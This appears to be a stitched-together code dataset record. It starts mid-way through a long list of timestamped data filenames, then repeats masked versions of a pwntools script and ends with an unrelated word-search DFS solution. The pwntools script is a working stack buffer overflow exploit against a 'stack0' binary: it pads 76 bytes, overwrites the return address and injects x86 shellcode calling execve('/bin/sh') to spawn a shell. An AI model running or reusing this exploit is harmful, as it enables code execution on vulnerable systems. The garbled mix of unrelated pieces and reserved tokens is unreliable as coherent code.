ue_Dec_30_22_46_50_2014.txt',\n'data2Tue_Dec_30_22_47_05_2014.txt',\n'data2Tue_Dec_3
0_22_47_20_2014.txt',\n'data2Tue_Dec_30_22_47_35_2014.txt',\n'data2Tue_Dec_30_22_47_49_2014.txt',\n'data2Tue_Dec_30_22_48_04_2014.txt',\n'data2Tue_Dec_30_22_48_19_2014.txt',\n'data2Tue_Dec_30_22_48_34_2014.txt',\n'data2Tue_Dec_30_22_48_49_2014.txt',\n'data2Tue_Dec_30_22_49_04_2014.txt',\n'data2Tue_Dec_30_22_49_19_2014.txt',\n'data2Tue_Dec_30_22_49_34_2014.txt',\n'data2Tue_Dec_30_22_49_49_2014.txt',\n'data2Tue_Dec_30_22_50_04_2014.txt',\n'data2Tue_Dec_30_22_50_19_2014.txt',\n'data2Tue_Dec_30_22_50_33_2014.txt',\n'data2Tue_Dec_30_22_50_48_2014.txt',\n'data2Tue_Dec_30_22_51_03_2014.txt',\n'data2Tue_Dec_30_22_51_18_2014.txt',\n'data2Tue_Dec_30_22_51_32_2014.txt',\n'data2Tue_Dec_30_22_51_47_2014.txt',\n'data2Tue_Dec_30_22_52_02_2014.txt',\n'data2Tue_Dec_30_22_52_16_2014.txt',\n'data2Tue_Dec_30_22_52_31_2014.txt',\n'data2Tue_Dec_30_22_52_46_2014.txt',\n'data2Tue_Dec_30_22_53_01_2014.txt',\n'data2Tue_Dec_30_22_53_16_2014.txt',\n'data2Tue_Dec_30_22_53_31_2014.txt',\n'data2Tue_Dec_30_22_53_45_2014.txt',\n'data2Tue_Dec_30_22_54_00_2014.txt',\n'data2Tue_Dec_30_22_54_15_2014.txt',\n'data2Tue_Dec_30_22_54_29_2014.txt',\n'data3Tue_Dec_30_22_54_44_2014.txt',\n'data3Tue_Dec_30_22_54_59_2014.txt',\n'data3Tue_Dec_30_22_55_13_2014.txt',\n'data3Tue_Dec_30_22_55_28_2014.txt',\n'data3Tue_Dec_30_22_55_43_2014.txt',\n'data3Tue_Dec_30_22_55_58_2014.txt',\n'data3Tue_Dec_30_22_56_13_2014.txt',\n'data3Tue_Dec_30_22_56_28_2014.txt',\n'data3Tue_Dec_30_22_56_43_2014.txt',\n'data3Tue_Dec_30_22_56_57_2014.txt',\n'data3Tue_Dec_30_22_57_12_2014.txt',\n'data3Tue_Dec_30_22_57_27_2014.txt',\n'data3Tue_Dec_30_22_57_42_2014.txt',\n'data3Tue_Dec_30_22_57_56_2014.txt',\n'data3Tue_Dec_30_22_58_12_2014.txt',\n'data3Tue_Dec_30_22_58_26_2014.txt',\n'data3Tue_Dec_30_22_58_41_2014.txt',\n'data3Tue_Dec_30_22_58_56_2014.txt',\n'data3Tue_Dec_30_22_59_10_2014.txt',\n'data3Tue_Dec_30_22_59_25_2014.txt',\n'data3Tue_Dec_30_22_59_40_2014.txt',\n'data3Tue_Dec_30_22_59_54_2014.txt',\n'data3Tue_Dec_30_23_00_10_2014.txt',\n'
data3Tue_Dec_30_23_00_25_2014.txt',\n'data3Tue_Dec_30_23_00_39_2014.txt',\n'data3Tue_Dec_30_23_00_54_2014.txt',\n'data3Tue_Dec_30_23_01_09_2014.txt',\n'data3Tue_Dec_30_23_01_23_2014.txt',\n'data3Tue_Dec_30_23_01_38_2014.txt',\n'data3Tue_Dec_30_23_01_53_2014.txt',\n'data3Tue_Dec_30_23_02_07_2014.txt',\n'data3Tue_Dec_30_23_02_22_2014.txt',\n'data3Tue_Dec_30_23_02_37_2014.txt',\n'data3Tue_Dec_30_23_02_52_2014.txt',\n'data3Tue_Dec_30_23_03_06_2014.txt',\n'data3Tue_Dec_30_23_03_21_2014.txt',\n'data3Tue_Dec_30_23_03_36_2014.txt',\n'data3Tue_Dec_30_23_03_51_2014.txt',\n'data3Tue_Dec_30_23_04_05_2014.txt',\n'data3Tue_Dec_30_23_04_20_2014.txt',\n'data3Tue_Dec_30_23_04_34_2014.txt',\n'data3Tue_Dec_30_23_04_49_2014.txt',\n'data3Tue_Dec_30_23_05_04_2014.txt',\n'data3Tue_Dec_30_23_05_19_2014.txt',\n'data3Tue_Dec_30_23_05_34_2014.txt',\n'data3Tue_Dec_30_23_05_49_2014.txt',\n'data3Tue_Dec_30_23_06_04_2014.txt',\n'data3Tue_Dec_30_23_06_18_2014.txt',\n'data3Tue_Dec_30_23_06_33_2014.txt',\n'data3Tue_Dec_30_23_06_48_2014.txt',\n'data0Tue_Dec_30_23_07_28_2014.txt',\n'data0Tue_Dec_30_23_07_42_2014.txt',\n'data0Tue_Dec_30_23_07_58_2014.txt',\n'data0Tue_Dec_30_23_08_12_2014.txt',\n'data0Tue_Dec_30_23_08_27_2014.txt',\n'data0Tue_Dec_30_23_08_42_2014.txt',\n'data0Tue_Dec_30_23_08_57_2014.txt',\n'data0Tue_Dec_30_23_09_12_2014.txt',\n'data0Tue_Dec_30_23_09_27_2014.txt',\n'data0Tue_Dec_30_23_09_42_2014.txt',\n'data0Tue_Dec_30_23_09_57_2014.txt',\n'data0Tue_Dec_30_23_10_12_2014.txt',\n'data0Tue_Dec_30_23_10_26_2014.txt',\n'data0Tue_Dec_30_23_10_42_2014.txt',\n'data0Tue_Dec_30_23_10_57_2014.txt',\n'data0Tue_Dec_30_23_11_12_2014.txt',\n'data0Tue_Dec_30_23_11_27_2014.txt',\n'data0Tue_Dec_30_23_11_42_2014.txt',\n'data0Tue_Dec_30_23_11_56_2014.txt',\n'data0Tue_Dec_30_23_12_11_2014.txt',\n'data0Tue_Dec_30_23_12_26_2014.txt',\n'data0Tue_Dec_30_23_12_40_2014.txt',\n'data0Tue_Dec_30_23_12_55_2014.txt',\n'data0Tue_Dec_30_23_13_10_2014.txt',\n'data0Tue_Dec_30_23_13_25_2014.txt',\n'data0Tue_Dec_30_23_13_40
_2014.txt',\n'data0Tue_Dec_30_23_13_55_2014.txt',\n'data0Tue_Dec_30_23_14_11_2014.txt',\n'data0Tue_Dec_30_23_14_26_2014.txt',\n'data0Tue_Dec_30_23_14_40_2014.txt',\n'data0Tue_Dec_30_23_14_55_2014.txt',\n'data0Tue_Dec_30_23_15_09_2014.txt',\n'data0Tue_Dec_30_23_15_24_2014.txt',\n'data0Tue_Dec_30_23_15_39_2014.txt',\n'data0Tue_Dec_30_23_15_54_2014.txt',\n'data0Tue_Dec_30_23_16_08_2014.txt',\n'data0Tue_Dec_30_23_16_23_2014.txt',\n'data0Tue_Dec_30_23_16_37_2014.txt',\n'data0Tue_Dec_30_23_16_52_2014.txt',\n'data0Tue_Dec_30_23_17_08_2014.txt',\n'data0Tue_Dec_30_23_17_23_2014.txt',\n'data0Tue_Dec_30_23_17_37_2014.txt',\n'data0Tue_Dec_30_23_17_52_2014.txt',\n'data0Tue_Dec_30_23_18_07_2014.txt',\n'data0Tue_Dec_30_23_18_22_2014.txt',\n'data0Tue_Dec_30_23_18_36_2014.txt',\n'data0Tue_Dec_30_23_18_51_2014.txt',\n'data0Tue_Dec_30_23_19_06_2014.txt',\n'data0Tue_Dec_30_23_19_21_2014.txt',\n'data0Tue_Dec_30_23_19_36_2014.txt',\n'data1Tue_Dec_30_23_19_50_2014.txt',\n'data1Tue_Dec_30_23_20_05_2014.txt',\n'data1Tue_Dec_30_23_20_20_2014.txt',\n'data1Tue_Dec_30_23_20_34_2014.txt',\n'data1Tue_Dec_30_23_20_49_2014.txt',\n'data1Tue_Dec_30_23_21_04_2014.txt',\n'data1Tue_Dec_30_23_21_19_2014.txt',\n'data1Tue_Dec_30_23_21_33_2014.txt',\n'data1Tue_Dec_30_23_21_48_2014.txt',\n'data1Tue_Dec_30_23_22_03_2014.txt',\n'data1Tue_Dec_30_23_22_18_2014.txt',\n'data1Tue_Dec_30_23_22_33_2014.txt',\n'data1Tue_Dec_30_23_22_48_2014.txt',\n'data1Tue_Dec_30_23_23_03_2014.txt',\n'data1Tue_Dec_30_23_23_17_2014.txt',\n'data1Tue_Dec_30_23_23_32_2014.txt',\n'data1Tue_Dec_30_23_23_47_2014.txt',\n'data1Tue_Dec_30_23_24_02_2014.txt',\n'data1Tue_Dec_30_23_24_16_2014.txt',\n'data1Tue_Dec_30_23_24_31_2014.txt',\n'data1Tue_Dec_30_23_24_45_2014.txt',\n'data1Tue_Dec_30_23_25_00_2014.txt',\n'data1Tue_Dec_30_23_25_15_2014.txt',\n'data1Tue_Dec_30_23_25_29_2014.txt',\n'data1Tue_Dec_30_23_25_44_2014.txt',\n'data1Tue_Dec_30_23_25_59_2014.txt',\n'data1Tue_Dec_30_23_26_13_2014.txt',\n'data1Tue_Dec_30_23_26_28_2014.txt',\n'data1Tue_D
ec_30_23_26_43_2014.txt',\n'data1Tue_Dec_30_23_26_58_2014.txt',\n'data1Tue_Dec_30_23_27_13_2014.txt',\n'data1Tue_Dec_30_23_27_27_2014.txt',\n'data1Tue_Dec_30_23_27_42_2014.txt',\n'data1Tue_Dec_30_23_27_57_2014.txt',\n'data1Tue_Dec_30_23_28_11_2014.txt',\n'data1Tue_Dec_30_23_28_26_2014.txt',\n'data1Tue_Dec_30_23_28_42_2014.txt',\n'data1Tue_Dec_30_23_28_56_2014.txt',\n'data1Tue_Dec_30_23_29_11_2014.txt',\n'data1Tue_Dec_30_23_29_26_2014.txt',\n'data1Tue_Dec_30_23_29_41_2014.txt',\n'data1Tue_Dec_30_23_29_56_2014.txt',\n'data1Tue_Dec_30_23_30_10_2014.txt',\n'data1Tue_Dec_30_23_30_25_2014.txt',\n'data1Tue_Dec_30_23_30_40_2014.txt',\n'data1Tue_Dec_30_23_30_55_2014.txt',\n'data1Tue_Dec_30_23_31_10_2014.txt',\n'data1Tue_Dec_30_23_31_25_2014.txt',\n'data1Tue_Dec_30_23_31_39_2014.txt',\n'data1Tue_Dec_30_23_31_54_2014.txt',\n'data2Tue_Dec_30_23_32_09_2014.txt',\n'data2Tue_Dec_30_23_32_24_2014.txt',\n'data2Tue_Dec_30_23_32_39_2014.txt',\n'data2Tue_Dec_30_23_32_53_2014.txt',\n'data2Tue_Dec_30_23_33_08_2014.txt',\n'data2Tue_Dec_30_23_33_23_2014.txt',\n'data2Tue_Dec_30_23_33_38_2014.txt',\n'data2Tue_Dec_30_23_33_53_2014.txt',\n'data2Tue_Dec_30_23_34_08_2014.txt',\n'data2Tue_Dec_30_23_34_23_2014.txt',\n'data2Tue_Dec_30_23_34_37_2014.txt',\n'data2Tue_Dec_30_23_34_52_2014.txt',\n'data2Tue_Dec_30_23_35_07_2014.txt',\n'data2Tue_Dec_30_23_35_22_2014.txt',\n'data2Tue_Dec_30_23_35_37_2014.txt',\n'data2Tue_Dec_30_23_35_52_2014.txt',\n'data2Tue_Dec_30_23_36_07_2014.txt',\n'data2Tue_Dec_30_23_36_22_2014.txt',\n'data2Tue_Dec_30_23_36_36_2014.txt',\n'data2Tue_Dec_30_23_36_51_2014.txt',\n'data2Tue_Dec_30_23_37_06_2014.txt',\n'data2Tue_Dec_30_23_37_20_2014.txt',\n'data2Tue_Dec_30_23_37_35_2014.txt',\n'data2Tue_Dec_30_23_37_50_2014.txt',\n'data2Tue_Dec_30_23_38_05_2014.txt',\n'data2Tue_Dec_30_23_38_20_2014.txt',\n'data2Tue_Dec_30_23_38_35_2014.txt',\n'data2Tue_Dec_30_23_38_50_2014.txt',\n'data2Tue_Dec_30_23_39_05_2014.txt',\n'data2Tue_Dec_30_23_39_19_2014.txt',\n'data2Tue_Dec_30_23_39_34_2014.txt'
,\n'data2Tue_Dec_30_23_39_49_2014.txt',\n'data2Tue_Dec_30_23_40_04_2014.txt',\n'data2Tue_Dec_30_23_40_18_2014.txt',\n'data2Tue_Dec_30_23_40_33_2014.txt',\n'data2Tue_Dec_30_23_40_48_2014.txt',\n'data2Tue_Dec_30_23_41_03_2014.txt',\n'data2Tue_Dec_30_23_41_18_2014.txt',\n'data2Tue_Dec_30_23_41_33_2014.txt',\n'data2Tue_Dec_30_23_41_48_2014.txt',\n'data2Tue_Dec_30_23_42_03_2014.txt',\n'data2Tue_Dec_30_23_42_18_2014.txt',\n'data2Tue_Dec_30_23_42_33_2014.txt',\n'data2Tue_Dec_30_23_42_47_2014.txt',\n'data2Tue_Dec_30_23_43_02_2014.txt',\n'data2Tue_Dec_30_23_43_18_2014.txt',\n'data2Tue_Dec_30_23_43_33_2014.txt',\n'data2Tue_Dec_30_23_43_47_2014.txt',\n'data2Tue_Dec_30_23_44_02_2014.txt',\n'data2Tue_Dec_30_23_44_17_2014.txt',\n'data3Tue_Dec_30_23_44_32_2014.txt',\n'data3Tue_Dec_30_23_44_46_2014.txt',\n'data3Tue_Dec_30_23_45_01_2014.txt',\n'data3Tue_Dec_30_23_45_16_2014.txt',\n'data3Tue_Dec_30_23_45_31_2014.txt',\n'data3Tue_Dec_30_23_45_46_2014.txt',\n'data3Tue_Dec_30_23_46_00_2014.txt',\n'data3Tue_Dec_30_23_46_16_2014.txt',\n'data3Tue_Dec_30_23_46_31_2014.txt',\n'data3Tue_Dec_30_23_46_46_2014.txt',\n'data3Tue_Dec_30_23_47_01_2014.txt',\n'data3Tue_Dec_30_23_47_16_2014.txt',\n'data3Tue_Dec_30_23_47_31_2014.txt',\n'data3Tue_Dec_30_23_47_46_2014.txt',\n'data3Tue_Dec_30_23_48_01_2014.txt',\n'data3Tue_Dec_30_23_48_16_2014.txt',\n'data3Tue_Dec_30_23_48_31_2014.txt',\n'data3Tue_Dec_30_23_48_45_2014.txt',\n'data3Tue_Dec_30_23_49_00_2014.txt',\n'data3Tue_Dec_30_23_49_15_2014.txt',\n'data3Tue_Dec_30_23_49_30_2014.txt',\n'data3Tue_Dec_30_23_49_45_2014.txt',\n'data3Tue_Dec_30_23_49_59_2014.txt',\n'data3Tue_Dec_30_23_50_14_2014.txt',\n'data3Tue_Dec_30_23_50_29_2014.txt',\n'data3Tue_Dec_30_23_50_44_2014.txt',\n'data3Tue_Dec_30_23_50_59_2014.txt',\n'data3Tue_Dec_30_23_51_13_2014.txt',\n'data3Tue_Dec_30_23_51_28_2014.txt',\n'data3Tue_Dec_30_23_51_43_2014.txt',\n'data3Tue_Dec_30_23_51_57_2014.txt',\n'data3Tue_Dec_30_23_52_13_2014.txt',\n'data3Tue_Dec_30_23_52_28_2014.txt',\n'data3Tue_Dec_30_23_5
2_43_2014.txt',\n'data3Tue_Dec_30_23_52_58_2014.txt',\n'data3Tue_Dec_30_23_53_12_2014.txt',\n'data3Tue_Dec_30_23_53_27_2014.txt',\n'data3Tue_Dec_30_23_53_42_2014.txt',\n'data3Tue_Dec_30_23_53_56_2014.txt',\n'data3Tue_Dec_30_23_54_11_2014.txt',\n'data3Tue_Dec_30_23_54_26_2014.txt',\n'data3Tue_Dec_30_23_54_41_2014.txt',\n'data3Tue_Dec_30_23_54_56_2014.txt',\n'data3Tue_Dec_30_23_55_11_2014.txt',\n'data3Tue_Dec_30_23_55_26_2014.txt',\n'data3Tue_Dec_30_23_55_41_2014.txt',\n'data3Tue_Dec_30_23_55_55_2014.txt',\n'data3Tue_Dec_30_23_56_10_2014.txt',\n'data3Tue_Dec_30_23_56_25_2014.txt',\n'data3Tue_Dec_30_23_56_40_2014.txt',\n'data0Tue_Dec_30_23_57_21_2014.txt',\n'data0Tue_Dec_30_23_57_36_2014.txt',\n'data0Tue_Dec_30_23_57_51_2014.txt',\n'data0Tue_Dec_30_23_58_06_2014.txt',\n'data0Tue_Dec_30_23_58_20_2014.txt',\n'data0Tue_Dec_30_23_58_35_2014.txt',\n'data0Tue_Dec_30_23_58_50_2014.txt',\n'data0Tue_Dec_30_23_59_05_2014.txt',\n'data0Tue_Dec_30_23_59_20_2014.txt',\n'data0Tue_Dec_30_23_59_35_2014.txt',\n'data0Tue_Dec_30_23_59_49_2014.txt',\n'data0Wed_Dec_31_00_00_04_2014.txt',\n'data0Wed_Dec_31_00_00_18_2014.txt',\n'data0Wed_Dec_31_00_00_33_2014.txt',\n'data0Wed_Dec_31_00_00_48_2014.txt',\n'data0Wed_Dec_31_00_01_02_2014.txt',\n'data0Wed_Dec_31_00_01_17_2014.txt',\n'data0Wed_Dec_31_00_01_32_2014.txt',\n'data0Wed_Dec_31_00_01_48_2014.txt',\n'data0Wed_Dec_31_00_02_02_2014.txt',\n'data0Wed_Dec_31_00_02_18_2014.txt',\n'data0Wed_Dec_31_00_02_32_2014.txt',\n'data0Wed_Dec_31_00_02_47_2014.txt',\n'data0Wed_Dec_31_00_03_01_2014.txt',\n'data0Wed_Dec_31_00_03_17_2014.txt',\n'data0Wed_Dec_31_00_03_32_2014.txt',\n'data0Wed_Dec_31_00_03_46_2014.txt',\n'data0Wed_Dec_31_00_04_01_2014.txt',\n'data0Wed_Dec_31_00_04_16_2014.txt',\n'data0Wed_Dec_31_00_04_31_2014.txt',\n'data0Wed_Dec_31_00_04_46_2014.txt',\n'data0Wed_Dec_31_00_05_00_2014.txt',\n'data0Wed_Dec_31_00_05_15_2014.txt',\n'data0Wed_Dec_31_00_05_31_2014.txt',\n'data0Wed_Dec_31_00_05_46_2014.txt',\n'data0Wed_Dec_31_00_06_01_2014.txt',\n'data0W
ed_Dec_31_00_06_15_2014.txt',\n'data0Wed_Dec_31_00_06_30_2014.txt',\n'data0Wed_Dec_31_00_06_45_2014.txt',\n'data0Wed_Dec_31_00_07_00_2014.txt',\n'data0Wed_Dec_31_00_07_14_2014.txt',\n'data0Wed_Dec_31_00_07_29_2014.txt',\n'data0Wed_Dec_31_00_07_44_2014.txt',\n'data0Wed_Dec_31_00_07_59_2014.txt',\n'data0Wed_Dec_31_00_08_13_2014.txt',\n'data0Wed_Dec_31_00_08_28_2014.txt',\n'data0Wed_Dec_31_00_08_43_2014.txt',\n'data0Wed_Dec_31_00_08_57_2014.txt',\n'data0Wed_Dec_31_00_09_12_2014.txt',\n'data0Wed_Dec_31_00_09_27_2014.txt',\n'data1Wed_Dec_31_00_09_42_2014.txt',\n'data1Wed_Dec_31_00_09_57_2014.txt',\n'data1Wed_Dec_31_00_10_11_2014.txt',\n'data1Wed_Dec_31_00_10_26_2014.txt',\n'data1Wed_Dec_31_00_10_41_2014.txt',\n'data1Wed_Dec_31_00_10_56_2014.txt',\n'data1Wed_Dec_31_00_11_11_2014.txt',\n'data1Wed_Dec_31_00_11_26_2014.txt',\n'data1Wed_Dec_31_00_11_40_2014.txt',\n'data1Wed_Dec_31_00_11_55_2014.txt',\n'data1Wed_Dec_31_00_12_10_2014.txt',\n'data1Wed_Dec_31_00_12_25_2014.txt',\n'data1Wed_Dec_31_00_12_40_2014.txt',\n'data1Wed_Dec_31_00_12_54_2014.txt',\n'data1Wed_Dec_31_00_13_09_2014.txt',\n'data1Wed_Dec_31_00_13_24_2014.txt',\n'data1Wed_Dec_31_00_13_39_2014.txt',\n'data1Wed_Dec_31_00_13_54_2014.txt',\n'data1Wed_Dec_31_00_14_09_2014.txt',\n'data1Wed_Dec_31_00_14_24_2014.txt',\n'data1Wed_Dec_31_00_14_38_2014.txt',\n'data1Wed_Dec_31_00_14_53_2014.txt',\n'data1Wed_Dec_31_00_15_07_2014.txt',\n'data1Wed_Dec_31_00_15_22_2014.txt',\n'data1Wed_Dec_31_00_15_37_2014.txt',\n'data1Wed_Dec_31_00_15_52_2014.txt',\n'data1Wed_Dec_31_00_16_06_2014.txt',\n'data1Wed_Dec_31_00_16_22_2014.txt',\n'data1Wed_Dec_31_00_16_38_2014.txt',\n'data1Wed_Dec_31_00_16_52_2014.txt',\n'data1Wed_Dec_31_00_17_07_2014.txt',\n'data1Wed_Dec_31_00_17_22_2014.txt',\n'data1Wed_Dec_31_00_17_37_2014.txt',\n'data1Wed_Dec_31_00_17_51_2014.txt',\n'data1Wed_Dec_31_00_18_06_2014.txt',\n'data1Wed_Dec_31_00_18_20_2014.txt',\n'data1Wed_Dec_31_00_18_35_2014.txt',\n'data1Wed_Dec_31_00_18_50_2014.txt',\n'data1Wed_Dec_31_00_19_04_2014.
txt',\n'data1Wed_Dec_31_00_19_19_2014.txt',\n'data1Wed_Dec_31_00_19_34_2014.txt',\n'data1Wed_Dec_31_00_19_48_2014.txt',\n'data1Wed_Dec_31_00_20_03_2014.txt',\n'data1Wed_Dec_31_00_20_18_2014.txt',\n'data1Wed_Dec_31_00_20_33_2014.txt',\n'data1Wed_Dec_31_00_20_48_2014.txt',\n'data1Wed_Dec_31_00_21_03_2014.txt',\n'data1Wed_Dec_31_00_21_18_2014.txt',\n'data1Wed_Dec_31_00_21_32_2014.txt',\n'data1Wed_Dec_31_00_21_47_2014.txt',\n'data2Wed_Dec_31_00_22_02_2014.txt',\n'data2Wed_Dec_31_00_22_17_2014.txt',\n'data2Wed_Dec_31_00_22_32_2014.txt',\n'data2Wed_Dec_31_00_22_47_2014.txt',\n'data2Wed_Dec_31_00_23_01_2014.txt',\n'data2Wed_Dec_31_00_23_16_2014.txt',\n'data2Wed_Dec_31_00_23_31_2014.txt',\n'data2Wed_Dec_31_00_23_46_2014.txt',\n'data2Wed_Dec_31_00_24_01_2014.txt',\n'data2Wed_Dec_31_00_24_16_2014.txt',\n'data2Wed_Dec_31_00_24_30_2014.txt',\n'data2Wed_Dec_31_00_24_45_2014.txt',\n'data2Wed_Dec_31_00_25_00_2014.txt',\n'data2Wed_Dec_31_00_25_15_2014.txt',\n'data2Wed_Dec_31_00_25_29_2014.txt',\n'data2Wed_Dec_31_00_25_44_2014.txt',\n'data2Wed_Dec_31_00_25_59_2014.txt',\n'data2Wed_Dec_31_00_26_14_2014.txt',\n'data2Wed_Dec_31_00_26_29_2014.txt',\n'data2Wed_Dec_31_00_26_43_2014.txt',\n'data2Wed_Dec_31_00_26_59_2014.txt',\n'data2Wed_Dec_31_00_27_13_2014.txt',\n'data2Wed_Dec_31_00_27_28_2014.txt',\n'data2Wed_Dec_31_00_27_43_2014.txt',\n'data2Wed_Dec_31_00_27_58_2014.txt',\n'data2Wed_Dec_31_00_28_13_2014.txt',\n'data2Wed_Dec_31_00_28_28_2014.txt',\n'data2Wed_Dec_31_00_28_43_2014.txt',\n'data2Wed_Dec_31_00_28_57_2014.txt',\n'data2Wed_Dec_31_00_29_12_2014.txt',\n'data2Wed_Dec_31_00_29_27_2014.txt',\n'data2Wed_Dec_31_00_29_42_2014.txt',\n'data2Wed_Dec_31_00_29_57_2014.txt',\n'data2Wed_Dec_31_00_30_12_2014.txt',\n'data2Wed_Dec_31_00_30_27_2014.txt',\n'data2Wed_Dec_31_00_30_42_2014.txt',\n'data2Wed_Dec_31_00_30_57_2014.txt',\n'data2Wed_Dec_31_00_31_12_2014.txt',\n'data2Wed_Dec_31_00_31_27_2014.txt',\n'data2Wed_Dec_31_00_31_41_2014.txt',\n'data2Wed_Dec_31_00_31_56_2014.txt',\n'data2Wed_Dec_31_
00_32_11_2014.txt',\n'data2Wed_Dec_31_00_32_26_2014.txt',\n'data2Wed_Dec_31_00_32_40_2014.txt',\n'data2Wed_Dec_31_00_32_55_2014.txt',\n'data2Wed_Dec_31_00_33_10_2014.txt',\n'data2Wed_Dec_31_00_33_24_2014.txt',\n'data2Wed_Dec_31_00_33_39_2014.txt',\n'data2Wed_Dec_31_00_33_54_2014.txt',\n'data2Wed_Dec_31_00_34_09_2014.txt',\n'data3Wed_Dec_31_00_34_24_2014.txt',\n'data3Wed_Dec_31_00_34_39_2014.txt',\n'data3Wed_Dec_31_00_34_54_2014.txt',\n'data3Wed_Dec_31_00_35_09_2014.txt',\n'data3Wed_Dec_31_00_35_24_2014.txt',\n'data3Wed_Dec_31_00_35_39_2014.txt',\n'data3Wed_Dec_31_00_35_54_2014.txt',\n'data3Wed_Dec_31_00_36_08_2014.txt',\n'data3Wed_Dec_31_00_36_23_2014.txt',\n'data3Wed_Dec_31_00_36_38_2014.txt',\n'data3Wed_Dec_31_00_36_53_2014.txt',\n'data3Wed_Dec_31_00_37_08_2014.txt',\n'data3Wed_Dec_31_00_37_22_2014.txt',\n'data3Wed_Dec_31_00_37_38_2014.txt',\n'data3Wed_Dec_31_00_37_53_2014.txt',\n'data3Wed_Dec_31_00_38_08_2014.txt',\n'data3Wed_Dec_31_00_38_22_2014.txt',\n'data3Wed_Dec_31_00_38_37_2014.txt',\n'data3Wed_Dec_31_00_38_52_2014.txt',\n'data3Wed_Dec_31_00_39_07_2014.txt',\n'data3Wed_Dec_31_00_39_22_2014.txt',\n'data3Wed_Dec_31_00_39_36_2014.txt',\n'data3Wed_Dec_31_00_39_51_2014.txt',\n'data3Wed_Dec_31_00_40_06_2014.txt',\n'data3Wed_Dec_31_00_40_21_2014.txt',\n'data3Wed_Dec_31_00_40_36_2014.txt',\n'data3Wed_Dec_31_00_40_50_2014.txt',\n'data3Wed_Dec_31_00_41_05_2014.txt',\n'data3Wed_Dec_31_00_41_20_2014.txt',\n'data3Wed_Dec_31_00_41_34_2014.txt',\n'data3Wed_Dec_31_00_41_50_2014.txt',\n'data3Wed_Dec_31_00_42_04_2014.txt',\n'data3Wed_Dec_31_00_42_19_2014.txt',\n'data3Wed_Dec_31_00_42_33_2014.txt',\n'data3Wed_Dec_31_00_42_48_2014.txt',\n'data3Wed_Dec_31_00_43_03_2014.txt',\n'data3Wed_Dec_31_00_43_18_2014.txt',\n'data3Wed_Dec_31_00_43_33_2014.txt',\n'data3Wed_Dec_31_00_43_48_2014.txt',\n'data3Wed_Dec_31_00_44_03_2014.txt',\n'data3Wed_Dec_31_00_44_18_2014.txt',\n'data3Wed_Dec_31_00_44_33_2014.txt',\n'data3Wed_Dec_31_00_44_48_2014.txt',\n'data3Wed_Dec_31_00_45_03_2014.txt',\n'da
ta3Wed_Dec_31_00_45_18_2014.txt',\n'data3Wed_Dec_31_00_45_33_2014.txt',\n'data3Wed_Dec_31_00_45_48_2014.txt',\n'data3Wed_Dec_31_00_46_03_2014.txt',\n'data3Wed_Dec_31_00_46_18_2014.txt',\n'data3Wed_Dec_31_00_46_32_2014.txt']\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
r.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))
r.sendline(shellcode)
r.interactive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
shellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'
) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'
) + '/bin/sh'
r = process('./stack0', aslr=True)
r.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))
r.sendline(shellcode)
r.interactive()
<|reserved_special_token_1|>
from pwn import *
shellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'
) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'
) + '/bin/sh'
r = process('./stack0', aslr=True)
r.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))
r.sendline(shellcode)
r.interactive()
<|reserved_special_token_1|>
#inject shellcode
from pwn import *
shellcode =p32(0x8049000+0x4)\
+asm("mov eax,SYS_execve")\
+asm("xor ecx,ecx")\
+asm("xor edx,edx")\
+asm("mov ebx,0x8049014")\
+asm("int 0x80")\
+"/bin/sh"
r=process("./stack0",aslr=True)
r.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))
r.sendline(shellcode)
r.interactive()
|
flexible
|
{
"blob_id": "cf70d6064fd4a43bc17cd852aaf04afade73d995",
"index": 9252,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-3": "<mask token>\nshellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'\n ) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'\n ) + '/bin/sh'\nr = process('./stack0', aslr=True)\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-4": "from pwn import *\nshellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'\n ) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'\n ) + '/bin/sh'\nr = process('./stack0', aslr=True)\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-5": "#inject shellcode\nfrom pwn import *\n\n\nshellcode =p32(0x8049000+0x4)\\\n+asm(\"mov eax,SYS_execve\")\\\n+asm(\"xor ecx,ecx\")\\\n+asm(\"xor edx,edx\")\\\n+asm(\"mov ebx,0x8049014\")\\\n+asm(\"int 0x80\")\\\n+\"/bin/sh\"\nr=process(\"./stack0\",aslr=True)\nr.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))\nr.sendline(shellcode)\nr.interactive()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
def dfs(i, j, word, visited=set()):
if not word:
return True
for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):
if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:
if board[ni][nj] == word[0]:
if dfs(ni, nj, word[1:], visited | {(ni, nj)}):
return True
return False
m, n = len(board), len(board[0])
for i in range(m):
for j in range(n):
if board[i][j] == word[0]:
if dfs(i, j, word[1:], set([(i, j)])):
return True
return False
